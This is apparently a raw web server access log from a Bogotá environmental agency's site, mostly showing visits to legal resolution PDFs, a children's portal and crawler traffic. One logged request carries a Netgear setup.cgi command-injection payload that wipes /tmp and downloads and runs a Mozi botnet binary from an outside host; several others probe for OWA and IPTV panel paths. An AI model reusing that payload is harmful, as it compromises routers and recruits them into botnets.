200.10.154.81 - - [18/May/2022:20:18:06 -0500] "GET /portaldeninos/wp-content/uploads/2022/01/Conoce-lo-que-hace-la-Secretar%C3%ADa-de-Ambiente.mp4 HTTP/1.1" 206 6599959
200.10.154.81 - - [18/May/2022:20:18:04 -0500] "GET /portaldeninos/wp-content/uploads/2019/06/CabezoteAMBIENTIC.mp4 HTTP/1.1" 206 21677757
200.10.154.81 - - [18/May/2022:20:18:28 -0500] "GET /portaldeninos/residuos HTTP/1.1" 301 -
200.10.154.81 - - [18/May/2022:20:18:28 -0500] "GET /portaldeninos/residuos/ HTTP/1.1" 200 87644
200.10.154.81 - - [18/May/2022:20:18:29 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/residuos-pagina-ni%C3%B1os.jpg HTTP/1.1" 200 316433
31.13.115.13 - - [18/May/2022:20:18:37 -0500] "GET /bogota-tendra-una-nueva-reciclaton-empresarial.html?fbclid=IwAR0rhk_-lT4jJBDjemNduJMDjfpz1Blf6A_JUMnZWurpb8h9stUcIRa4v6w HTTP/1.1" 200 886
172.22.2.4 - - [18/May/2022:20:17:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
69.63.184.2 - - [18/May/2022:20:20:06 -0500] "GET /images/parque-nal-secretaria.jpg HTTP/1.1" 200 168060
181.62.149.79 - - [18/May/2022:20:22:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1016.pdf HTTP/1.1" 200 431810
216.245.221.92 - - [18/May/2022:20:22:24 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/May/2022:20:22:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47212
172.22.2.4 - - [18/May/2022:20:22:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:24:00 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [18/May/2022:20:23:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47071
172.22.2.4 - - [18/May/2022:20:24:01 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:20:24:01 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:20:24:03 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:20:24:03 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:20:23:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [18/May/2022:20:23:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
172.22.2.4 - - [18/May/2022:20:25:00 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
66.249.79.111 - - [18/May/2022:20:26:42 -0500] "-" 408 -
216.245.221.92 - - [18/May/2022:20:27:24 -0500] "HEAD / HTTP/1.1" 200 -
181.62.149.79 - - [18/May/2022:20:27:26 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.62.149.79 - - [18/May/2022:20:27:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+CONJUNTAS%2F HTTP/1.1" 200 4762
181.62.149.79 - - [18/May/2022:20:27:38 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 27892
181.62.149.79 - - [18/May/2022:20:27:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0004.pdf HTTP/1.1" 200 2971982
172.22.2.4 - - [18/May/2022:20:28:59 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:20:28:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:28:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44924
172.22.2.4 - - [18/May/2022:20:29:01 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 44924
216.245.221.92 - - [18/May/2022:20:32:25 -0500] "HEAD / HTTP/1.1" 200 -
190.156.90.221 - - [18/May/2022:20:32:42 -0500] "GET /BLA/ HTTP/1.1" 200 538
190.156.90.221 - - [18/May/2022:20:32:50 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
190.156.90.221 - - [18/May/2022:20:32:53 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.156.90.221 - - [18/May/2022:20:32:47 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 16331
201.245.192.253 - - [18/May/2022:20:32:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47212
190.156.90.221 - - [18/May/2022:20:33:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 12235
190.156.90.221 - - [18/May/2022:20:33:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 381905
66.220.149.4 - - [18/May/2022:20:34:02 -0500] "GET /images/ecosistema-dia-internacional-tierra-21-abril.jpg HTTP/1.1" 200 30098
201.245.192.253 - - [18/May/2022:20:33:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47071
190.156.90.221 - - [18/May/2022:20:34:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/2656.pdf HTTP/1.1" 200 355358
172.22.2.4 - - [18/May/2022:20:33:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:34:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
190.156.90.221 - - [18/May/2022:20:37:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 324373
216.245.221.92 - - [18/May/2022:20:37:25 -0500] "HEAD / HTTP/1.1" 200 -
190.156.90.221 - - [18/May/2022:20:37:36 -0500] "GET /BLA/resoluciones/AUTOS%202020/4613.pdf HTTP/1.1" 200 408391
172.22.2.4 - - [18/May/2022:20:36:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62201
172.22.2.4 - - [18/May/2022:20:39:55 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:20:40:00 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/May/2022:20:40:10 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/May/2022:20:39:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:41:30 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:20:40:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [18/May/2022:20:42:25 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/May/2022:20:42:26 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
130.211.54.158 - - [18/May/2022:20:42:29 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [18/May/2022:20:42:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47212
69.63.189.1 - - [18/May/2022:20:43:32 -0500] "GET /elabora-tu-jardin-vertical-y-contribuye-a-mitigar-los-efectos-del-cambio-climatico.html HTTP/1.1" 206 985
201.245.192.253 - - [18/May/2022:20:43:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47071
207.46.13.37 - - [18/May/2022:20:45:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2903.pdf HTTP/1.1" 304 -
207.46.13.74 - - [18/May/2022:20:46:04 -0500] "GET /bla/resoluciones/resoluciones%202022/0375.pdf HTTP/1.1" 200 368798
172.22.2.4 - - [18/May/2022:20:45:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/May/2022:20:47:24 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.74 - - [18/May/2022:20:47:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/2656.pdf HTTP/1.1" 200 355358
172.22.2.4 - - [18/May/2022:20:46:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
157.55.39.8 - - [18/May/2022:20:50:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/4613.pdf HTTP/1.1" 200 408391
172.22.2.4 - - [18/May/2022:20:50:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [18/May/2022:20:52:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:51:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:20:52:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
157.55.39.43 - - [18/May/2022:20:55:47 -0500] "GET /BLA/resoluciones/index.php?dir=Decretos/&sort=name&order=asc HTTP/1.1" 200 6804
207.46.13.37 - - [18/May/2022:20:56:00 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [18/May/2022:20:56:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [18/May/2022:20:56:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
181.59.33.56 - - [18/May/2022:20:56:24 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.59.33.56 - - [18/May/2022:20:56:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 27892
172.22.2.4 - - [18/May/2022:20:56:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
181.59.33.56 - - [18/May/2022:20:57:05 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 263612
216.245.221.92 - - [18/May/2022:20:57:24 -0500] "HEAD / HTTP/1.1" 200 -
181.59.33.56 - - [18/May/2022:20:57:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3067.pdf HTTP/1.1" 200 893976
181.61.208.204 - - [18/May/2022:20:57:35 -0500] "GET /asi-avanza-la-recuperacion-del-rio-bogota.html HTTP/1.1" 200 685
207.46.13.18 - - [18/May/2022:20:58:20 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
172.22.2.4 - - [18/May/2022:20:58:37 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [18/May/2022:20:58:38 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
191.95.171.184 - - [18/May/2022:20:58:39 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.95.171.184 - - [18/May/2022:20:58:40 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.95.171.184 - - [18/May/2022:20:58:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
172.22.2.4 - - [18/May/2022:20:57:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.38 - - [18/May/2022:20:59:09 -0500] "GET /bla/resoluciones/resoluciones%202022/0297.pdf HTTP/1.1" 200 340045
191.95.171.184 - - [18/May/2022:20:59:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0938.pdf HTTP/1.1" 200 270803
172.22.2.4 - - [18/May/2022:20:58:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [18/May/2022:21:02:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:03:57 -0500] "GET /BLA/boletinlegal/system_api.php HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:21:03:59 -0500] "GET /BLA/boletinlegal/c/version.js HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:21:04:01 -0500] "GET /BLA/boletinlegal/streaming/clients_live.php HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:21:04:03 -0500] "GET /BLA/boletinlegal/stalker_portal/c/version.js HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:21:04:05 -0500] "GET /BLA/boletinlegal/stream/live.php HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:21:04:06 -0500] "GET /BLA/boletinlegal/flu/403.html HTTP/1.1" 404 1018
173.252.87.23 - - [18/May/2022:21:04:24 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
173.252.87.117 - - [18/May/2022:21:04:30 -0500] "GET /images/actividades-dia-aves-16-mayo.jpg HTTP/1.1" 200 147089
157.55.39.8 - - [18/May/2022:21:04:34 -0500] "GET /bla/resoluciones/resoluciones%202022/0414.pdf HTTP/1.1" 200 348566
172.22.2.4 - - [18/May/2022:21:03:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:04:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [18/May/2022:21:03:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
186.86.33.172 - - [18/May/2022:21:07:22 -0500] "GET /bogota-tendra-una-nueva-reciclaton-empresarial.html HTTP/1.1" 200 886
216.245.221.92 - - [18/May/2022:21:07:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:05:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63342
186.83.246.86 - - [18/May/2022:21:09:50 -0500] "GET /si-te-gusta-la-pintura-el-dibujo-o-la-fotografia-el-concurso-a-vuelo-de-pajaro-es-para-ti.html?fbclid=IwAR3adbBdy2AvoVb0cuEJmS75TZQtlt8qW0d3Sk1U_ubtYLaDLghR8xteif8 HTTP/1.1" 200 861
172.22.2.4 - - [18/May/2022:21:08:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:09:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
34.147.77.153 - - [18/May/2022:21:11:00 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [18/May/2022:21:09:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55450
216.245.221.92 - - [18/May/2022:21:12:24 -0500] "HEAD / HTTP/1.1" 200 -
190.156.90.221 - - [18/May/2022:21:13:13 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
172.22.2.4 - - [18/May/2022:21:14:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:15:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [18/May/2022:21:17:24 -0500] "HEAD / HTTP/1.1" 200 -
186.82.247.236 - - [18/May/2022:21:18:42 -0500] "GET /bogota-tendra-una-nueva-reciclaton-empresarial.html HTTP/1.1" 200 886
201.244.241.6 - - [18/May/2022:21:19:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 456575
201.244.241.6 - - [18/May/2022:21:20:08 -0500] "GET /BLA/resoluciones/AUTOS%202017/5303.pdf HTTP/1.1" 200 299986
193.106.191.48 - - [18/May/2022:21:22:11 -0500] "GET /console/ HTTP/1.1" 404 1018
172.22.2.4 - - [18/May/2022:21:20:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/May/2022:21:22:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:21:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52537
172.22.2.4 - - [18/May/2022:21:21:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
201.245.192.253 - - [18/May/2022:21:22:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47189
40.77.167.38 - - [18/May/2022:21:23:51 -0500] "GET /bla/resoluciones/resoluciones%202022/0230.pdf HTTP/1.1" 200 336290
201.245.192.253 - - [18/May/2022:21:23:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47218
216.245.221.92 - - [18/May/2022:21:27:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:26:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:27:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [18/May/2022:21:28:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
216.245.221.92 - - [18/May/2022:21:32:24 -0500] "HEAD / HTTP/1.1" 200 -
175.107.13.220 - - [18/May/2022:21:33:03 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.13.220:35346/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [18/May/2022:21:31:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
201.245.192.253 - - [18/May/2022:21:32:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47189
172.22.2.4 - - [18/May/2022:21:32:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [18/May/2022:21:33:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47218
172.22.2.4 - - [18/May/2022:21:33:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
186.102.49.0 - - [18/May/2022:21:34:45 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19+cVxYKZlKvKPjEbZDCiQM3abWrbptT6gMJRhZ5oyioo4PCAvSUPbR&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 30
186.102.49.0 - - [18/May/2022:21:34:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19lwfww3up/SsLpiL3kZ/P5R4z6H0TwEucGVYkeSCK7gIfnX90wmh+Iz1cR34nkTbvLgnMvphM1A4YhOuVifHgwcRuJ/7I61ak=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 97
186.102.49.0 - - [18/May/2022:21:34:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/kxCBOFMbcAvL2p4/aTtmBykHupbXP+pAu7fTRiZjewCfYMN4QY3CKc2tXHyzAB5Eyu2fU41RGHQyCXGf8bohVcNPl85li99CquuWel4eyoAP2fi/LIXu5nNfbFTXZRJo89E7zj1XXy5795XB3/qFOHQYzJRnQYyjMkOcrtKvz9AaSW2NAG2kH4p/Gbx82wRvNzKhZoVFHq9pLM3hP0ErsC46hy6NwisAaOmwsVUQUS8PlHtaGhdg1tA2xl468SR9DZaBgoGq1RJUzLUxvdu6pbhvf+a1Rw1Ate5nV+H3pTvMCDtgCnAIv7hfH043xIDgfrhkUTTMpmy5w+OWOooEG/vnL8EYuZAYtj2KkjjXrjThJvgqN3tF7EMxD0SMO/bNr+x+pyxbkfLlxReyarhwWs4C+qqnoy9kelAj7cTPRCmWfM3n/CL0g8JtyPVMya6MPQ/zyrVDyoz4J38LG3Pwrlg9VbMnAJbLBxTji9K4iyyJ+PALOJBJLJnPjjKo3OofC4fsgOoiIf6uudTi3lpjaW/9qTBznbtqejcR4Sh6kzXj4quDKp5t/n2vFfxI52PSXXIZktq98fRpkeLCJPvdHDCHkr8y4ozHxy+gATI8RT+dticnTSGvHoZWP9/RvxEvUU9Qyk0VDr5j5AQU0iDrJKT7uWFXF0lJs1vehcnGVjDZhPIQAR8Jljuk79YeB1Q3MFbxlUv6mpw9hGQXy2xD9KnMgF+YaPrAfjaHmDtIgHoGN9OA40gcwQLVxkk6nhB89j6DzG5RI22TdiKSpnZCKODM+0Hdd0KANN+3jh64ZvGkl5J+TsESII2wESWsh2Izl74uOL8X2meIs3YwN58SP8D5eNgFhZbZg51Hg2GNOpyDCZCD/8MjLjp1/mbxy/oz/URItgBWat7fB2Fm8txG2cLFBZXvs2Rr+VUOiF6Tf3gCQc2IGWl8lvtnZFur02sZbZQgbsvqQu3/LI5KWFvIXf/Eu4Hb5pp9b9+sfEwAHn0ijXWbV9X7xyDKXVsfBFPryQmpOCGhDE1SNh+9Z4q486d7KboefN056NKQIlGqRJfgKQXUyBZa34FFCoEUYYAyQjbbjemMXyNzBZicsv0K2dBpvEriTAgHjO0Sbek2k0UD7kEKOVE99uqYPSCGxKjPjfQd2c32UzjQL4H212UHq/31PvphrOL8rYM8CkYrBszxs5NrcWj04j+Af6tKVA2SLduWJt3tI9At6LaQwdpxyJ/0+kmn3qZ2UeJYp+Xirni52EuRR4Rvsnbg+CzFpw8f7dA5Ifh3mL8x+WBuja3jDsammoCsDZcva2I9fdFPB8yY5WKITTnFzZoPU+bj4E4/sNTjj2WAKDPWV1NffQ08ZSGhJKDyIFko=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 2347
186.102.49.0 - - [18/May/2022:21:34:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19Yl/JsuBP1cFfaupXES1ornb2G48kZ82sH4u4LZwuRWdTHDHWNH/pH0YslPJ+t4MHqqYxF9D8JnqxMIb0nsRn6GNA2tcUW8NeRHulI+reoBbAdJ1VGouIhp65eNGZQ3/NRrKhyHy/F96dYXknoqCPNNF7s/HHDdsG9yK5DK/PsNXdHkJTNug3MX9CwQ6ZgOD4aLo93ud3fGrAVhln4MhVOo5WzQlbnATW14gy2Rrm3p7WU/kYIPf0Yu7L7gkk5lBkx0SOTBbOWq0GbtBnpvAkHkhN0GfVUDJU=&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 176
186.102.49.0 - - [18/May/2022:21:34:46 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19+cVxYKZlKvKPjEbZDCiQM3abWrbptT6gMJRhZ5oyioo4PCAvSUPbR HTTP/1.1" 200 30992
181.62.149.79 - - [18/May/2022:21:36:54 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.62.149.79 - - [18/May/2022:21:36:57 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 976272
216.245.221.92 - - [18/May/2022:21:37:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/May/2022:21:36:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63342
66.220.149.22 - - [18/May/2022:21:38:17 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
207.46.13.74 - - [18/May/2022:21:39:06 -0500] "GET /BLA/ HTTP/1.1" 200 538
172.22.2.4 - - [18/May/2022:21:38:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.225.119 - - [18/May/2022:21:39:49 -0500] "GET /somos-pioneros-en-la-inclusion-de-los-animales-de-compania-en-protocolos-de-emergencia.html HTTP/1.1" 304 -
172.22.2.4 - - [18/May/2022:21:40:01 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000003%20DEL%2007%20DE%20MARZO%20DEL%202022.pdf HTTP/1.1" 404 1038
172.22.2.4 - - [18/May/2022:21:40:05 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/May/2022:21:39:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [18/May/2022:21:40:14 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [18/May/2022:21:38:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48513
40.77.167.38 - - [18/May/2022:21:39:22 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 51365
216.245.221.92 - - [18/May/2022:21:42:24 -0500] "HEAD / HTTP/1.1" 200 -
186.102.49.0 - - [18/May/2022:21:43:04 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.102.49.0 - - [18/May/2022:21:43:04 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
201.245.192.253 - - [18/May/2022:21:42:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47189
186.102.49.0 - - [18/May/2022:21:43:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/VhVnYIjHKH6kV+wbw9usPG68Cdzf9/ZBZ7ZPp62vA/FFI6UmhLwLGZr9m0oHL9WGEVUd7Ha7iM5FDvcW9xoJzMLn70E8GEFXDZSL44JhwCJycIPJXZ7nBaw1rP3R/HBokJ4Y45qqu4a0tKF6r6w4agDsk8wFNxu6NSqJgJyOPvak3MCa2IiGkGVBH6Emyq7HjAOkHvJXq6xGwHsxHhQTxQOMa5v5EbV8ENW0xDzbkKkwhWD0Moem8c6Scmdz7/uJCcVmnJEt1dQ==&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 25
186.102.49.0 - - [18/May/2022:21:43:18 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Bh599TRLKAWhRvUvQelVaROAJEMedlwqp7aQfOhystVMWSkOM+jdoUg5mj5Q5wUMt6EJliZqb2DixSN65A2hJ8f+eBwtB/ks2ayHV+4L7KW3mlKdGIKXQTPx7GyXvjUc/I/sJqwh3LMxkkDUWpO0Ood6RnJLwYA1VnArjPN3ZnieXBsWRzDP7gyLI5pfcsXa+Q336mHgz4nFndUkk0jatizPtjkHctRmqdWYWPlYGMblsFv5rIzffnaVL8Hemg+t7R8lPpljvdlF1wdOUkOLfD6yDb2eN6IcW67swDzRdwfwMW0UNPJb9ZSDOU4+hjEycGELvWbb8HO6MuLeB++Zgjf9dsAN4zaCpPiMbNfuFJkWsO8wxinLUoMJfUfEhO2HjhBB+yOL5YMGEWbQVMbcOQ1j4kaItJYMeguzK0yqy3LNfXgVGbcNN+fGjgZ3NGxu/h5rt+8xKxTdxeFE4/lx95qTplLBSoaQZVMTdJNGgjM2ASwt7DxrGYCJpUV6lDCzuvcqW/oJijd9G5rYQvFayAE0KMOjkTvzzJ0gpcjj6XDXE/r36RIR9kk8ULtl9eer8Un5/wJqoKLPrPBXfd0nq/3wM6huUnk4Vb7IR38EJYPOL60d5GSJOHxYWUh248amD7yZ41SCuyTn/Z/Y+lNKAc2nzynfqE87L5FEWwTjLCJ4A2vmrGwmIXMsfh5v0QdgSKP3qNYtXtgiRHRfB0BwJ5Cohbes5o8O45VJubSGFMJUyVa3c355bY8JSJBFd5akz9Q2UVNLsEjHJwI1Hz9rIbDckwbYkYTZFkkpc9RnEiA2XUQ0V43Oo+/AVkraRpPhLerNF1HIfDmnDGHlB275U97I/jJbqZsL8f36nGXdPYuq2gowKoCIVKXgXkeuEN1eTnw7y8FEeQASer3T4+tK+8W/I1j/vZB4encvbi6SqKRpkLADPWGQbvSL08DoDHEsHbucPBuuTNN4mGfHTXgyN2bdGwgCie9i0PqLpOAB6+H9xXQCGtfAomOOjT5KCMVsJ2TWawg/XWm6c1L93XFatwgyE/WGgXoAnbh/Q0wCowNArAsh27zAbD42A8E47aXAW5WptLRTp2qyGXFAyVEmqVHubYZvSB7uzV+ualrbOXe+q0GipmrIji6TxytIt+aQLZC4DgVSfArENNr9mLOMTkpKRJfOIwf+8jC2W4qwCrDf+iIIDjZ1NKd6hzs3jgNUJkCmTpWSzUA==&u=U2FsdGVkX19G33n6+gIr6cGW+n7VAhhdwMny/xXAla0=&y=U2FsdGVkX19/cPCfKSSgmnsvbf07vIbB25tcetOmewnpUaM1n1DEJ55DO8gmnH4i HTTP/1.1" 200 25
